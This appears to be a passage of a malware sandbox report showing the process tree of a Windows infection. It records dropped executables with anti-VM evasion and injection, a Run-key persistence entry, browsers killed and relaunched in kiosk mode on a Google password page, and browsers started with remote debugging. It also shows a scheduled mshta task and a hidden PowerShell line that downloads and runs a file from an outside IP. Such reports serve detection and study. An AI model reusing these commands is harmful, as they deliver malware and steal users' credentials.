C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:4444
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086619001\3fd12b8336.exe"C:\Users\Admin\AppData\Local\Temp\1086619001\3fd12b8336.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2592 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:5084
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086620001\a6b1a4cd10.exe"C:\Users\Admin\AppData\Local\Temp\1086620001\a6b1a4cd10.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4300
-
-
C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4612
-
-
C:\Users\Admin\AppData\Local\Temp\1086623001\98d83610e7.exe"C:\Users\Admin\AppData\Local\Temp\1086623001\98d83610e7.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3848
-
-
C:\Users\Admin\AppData\Local\Temp\1086624001\db3a906615.exe"C:\Users\Admin\AppData\Local\Temp\1086624001\db3a906615.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4932 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 16006⤵
- Program crash
PID:5056
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086625001\fe4803757b.exe"C:\Users\Admin\AppData\Local\Temp\1086625001\fe4803757b.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:232
-
-
C:\Users\Admin\AppData\Local\Temp\1086626001\3f72e4fc3d.exe"C:\Users\Admin\AppData\Local\Temp\1086626001\3f72e4fc3d.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3444
-
-
C:\Users\Admin\AppData\Local\Temp\1086627001\c3e6079de5.exe"C:\Users\Admin\AppData\Local\Temp\1086627001\c3e6079de5.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1016 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3016
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2352
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:748
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4716
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵PID:4336
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4924 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2032 -parentBuildID 20240401114208 -prefsHandle 1948 -prefMapHandle 1940 -prefsLen 27352 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4b61c842-8d50-4f4e-a7bc-4123bf34ab09} 4924 "\\.\pipe\gecko-crash-server-pipe.4924" gpu8⤵PID:3656
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2504 -parentBuildID 20240401114208 -prefsHandle 2496 -prefMapHandle 2492 -prefsLen 28272 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c14bec48-8285-4bec-9046-3bfedc7da96b} 4924 "\\.\pipe\gecko-crash-server-pipe.4924" socket8⤵PID:3348
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3168 -childID 1 -isForBrowser -prefsHandle 3100 -prefMapHandle 2912 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1056 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb4e3646-775c-4ee0-b8a9-6c0555b06455} 4924 "\\.\pipe\gecko-crash-server-pipe.4924" tab8⤵PID:4460
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2848 -childID 2 -isForBrowser -prefsHandle 3672 -prefMapHandle 3668 -prefsLen 32762 -prefMapSize 244628 -jsInitHandle 1056 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {98d0f58b-20f3-47a8-bdc9-f8ef657142ab} 4924 "\\.\pipe\gecko-crash-server-pipe.4924" tab8⤵PID:4776
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4160 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4196 -prefMapHandle 4192 -prefsLen 32762 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf391d3a-e085-40b5-ac09-5d6afa3a8d01} 4924 "\\.\pipe\gecko-crash-server-pipe.4924" utility8⤵
- Checks processor information in registry
PID:6640
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5508 -childID 3 -isForBrowser -prefsHandle 5484 -prefMapHandle 5520 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1056 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a4130656-854c-49c9-a757-34bba5d8530b} 4924 "\\.\pipe\gecko-crash-server-pipe.4924" tab8⤵PID:5656
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5672 -childID 4 -isForBrowser -prefsHandle 5676 -prefMapHandle 5680 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1056 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed4416ff-be5e-4a50-8fff-95e4d099701b} 4924 "\\.\pipe\gecko-crash-server-pipe.4924" tab8⤵PID:5640
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5856 -childID 5 -isForBrowser -prefsHandle 5864 -prefMapHandle 5868 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1056 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {39da24f9-7f2d-44d6-8a2b-c83a4c42db73} 4924 "\\.\pipe\gecko-crash-server-pipe.4924" tab8⤵PID:5628
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 2216 -prefMapHandle 3272 -prefsLen 37525 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb01ede8-f455-482a-a218-038cb8d526c2} 4924 "\\.\pipe\gecko-crash-server-pipe.4924" gpu8⤵PID:4832
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086628001\e46b6a6a31.exe"C:\Users\Admin\AppData\Local\Temp\1086628001\e46b6a6a31.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1776 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn uf6nPmaVh4d /tr "mshta C:\Users\Admin\AppData\Local\Temp\nK5QoEJly.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
PID:4644 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn uf6nPmaVh4d /tr "mshta C:\Users\Admin\AppData\Local\Temp\nK5QoEJly.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3720
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\nK5QoEJly.hta6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5056 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NNZCTBMACAVASD9W9CX6NSMWIY1YNVNB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:992 -
C:\Users\Admin\AppData\Local\TempNNZCTBMACAVASD9W9CX6NSMWIY1YNVNB.EXE"C:\Users\Admin\AppData\Local\TempNNZCTBMACAVASD9W9CX6NSMWIY1YNVNB.EXE"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5520
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086629001\amnew.exe"C:\Users\Admin\AppData\Local\Temp\1086629001\amnew.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
PID:6960 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"6⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
PID:5268 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"7⤵
- Executes dropped EXE
PID:2520 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5712
-
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2196 -
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"8⤵
- Executes dropped EXE
PID:4820
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2196 -s 9608⤵
- Program crash
PID:6532
-
-
-
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6400 -
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"8⤵
- Executes dropped EXE
PID:6432
-
-
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"8⤵
- Executes dropped EXE
PID:6420
-
-
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"8⤵
- Executes dropped EXE
PID:6344
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6400 -s 10728⤵
- Program crash
PID:6292
-
-
-
C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"7⤵
- Executes dropped EXE
PID:3856
-
-
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2400 -
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1880
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2400 -s 10448⤵
- Program crash
PID:1184
-
-
-
C:\Users\Admin\AppData\Local\Temp\10007940101\279d785fdc.exe"C:\Users\Admin\AppData\Local\Temp\10007940101\279d785fdc.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SendNotifyMessage
PID:3444 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6236
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4408
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T8⤵
- Kills process with taskkill
PID:6924
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T8⤵
- Kills process with taskkill
PID:5856
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T8⤵
- Kills process with taskkill
PID:6072
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking8⤵PID:916
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking9⤵PID:4376
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2032 -parentBuildID 20240401114208 -prefsHandle 1672 -prefMapHandle 1664 -prefsLen 31384 -prefMapSize 245184 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1a2864b7-5b6c-42d6-9af1-e27478a740bf} 4376 "\\.\pipe\gecko-crash-server-pipe.4376" gpu10⤵PID:5172
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2488 -parentBuildID 20240401114208 -prefsHandle 2480 -prefMapHandle 2468 -prefsLen 32304 -prefMapSize 245184 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1c3511e7-f337-4c72-8e97-0ffa026174fa} 4376 "\\.\pipe\gecko-crash-server-pipe.4376" socket10⤵PID:4456
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10007950101\fd97c148fa.exe"C:\Users\Admin\AppData\Local\Temp\10007950101\fd97c148fa.exe"7⤵PID:1580
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086630001\2d75d5050b.exe"C:\Users\Admin\AppData\Local\Temp\1086630001\2d75d5050b.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6652
-
-
C:\Users\Admin\AppData\Local\Temp\1086631001\5fc62877eb.exe"C:\Users\Admin\AppData\Local\Temp\1086631001\5fc62877eb.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6740
-
-
C:\Users\Admin\AppData\Local\Temp\1086632001\3omTNLZ.exe"C:\Users\Admin\AppData\Local\Temp\1086632001\3omTNLZ.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6548
-
-
C:\Users\Admin\AppData\Local\Temp\1086633001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1086633001\7aencsM.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6920 -
C:\Users\Admin\AppData\Local\Temp\1086633001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1086633001\7aencsM.exe"6⤵
- Executes dropped EXE
PID:6824
-
-
C:\Users\Admin\AppData\Local\Temp\1086633001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1086633001\7aencsM.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:6756 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:6848 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x170,0x174,0x178,0x14c,0x17c,0x7ffccb6acc40,0x7ffccb6acc4c,0x7ffccb6acc588⤵PID:6820
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1792,i,12415371237522317495,2136088191179071972,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1788 /prefetch:28⤵PID:5280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2180,i,12415371237522317495,2136088191179071972,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2440 /prefetch:38⤵PID:5416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2212,i,12415371237522317495,2136088191179071972,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2448 /prefetch:88⤵PID:5356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3188,i,12415371237522317495,2136088191179071972,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3196 /prefetch:18⤵
- Uses browser remote debugging
PID:3356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3432,i,12415371237522317495,2136088191179071972,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3444 /prefetch:18⤵
- Uses browser remote debugging
PID:5556
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4452,i,12415371237522317495,2136088191179071972,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4576 /prefetch:18⤵
- Uses browser remote debugging
PID:2828
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4560,i,12415371237522317495,2136088191179071972,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4556 /prefetch:88⤵PID:5660
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4828,i,12415371237522317495,2136088191179071972,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4836 /prefetch:88⤵PID:4084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4968,i,12415371237522317495,2136088191179071972,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4728 /prefetch:88⤵PID:976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4740,i,12415371237522317495,2136088191179071972,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5040 /prefetch:88⤵PID:4340
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:6196 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffccb6b46f8,0x7ffccb6b4708,0x7ffccb6b47188⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,2541652093298288299,14069610132180498768,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2012 /prefetch:28⤵PID:6432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,2541652093298288299,14069610132180498768,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:38⤵PID:6428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,2541652093298288299,14069610132180498768,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2476 /prefetch:28⤵PID:6028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,2541652093298288299,14069610132180498768,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2612 /prefetch:88⤵PID:5520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,2541652093298288299,14069610132180498768,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2340 /prefetch:28⤵PID:1892
-
-
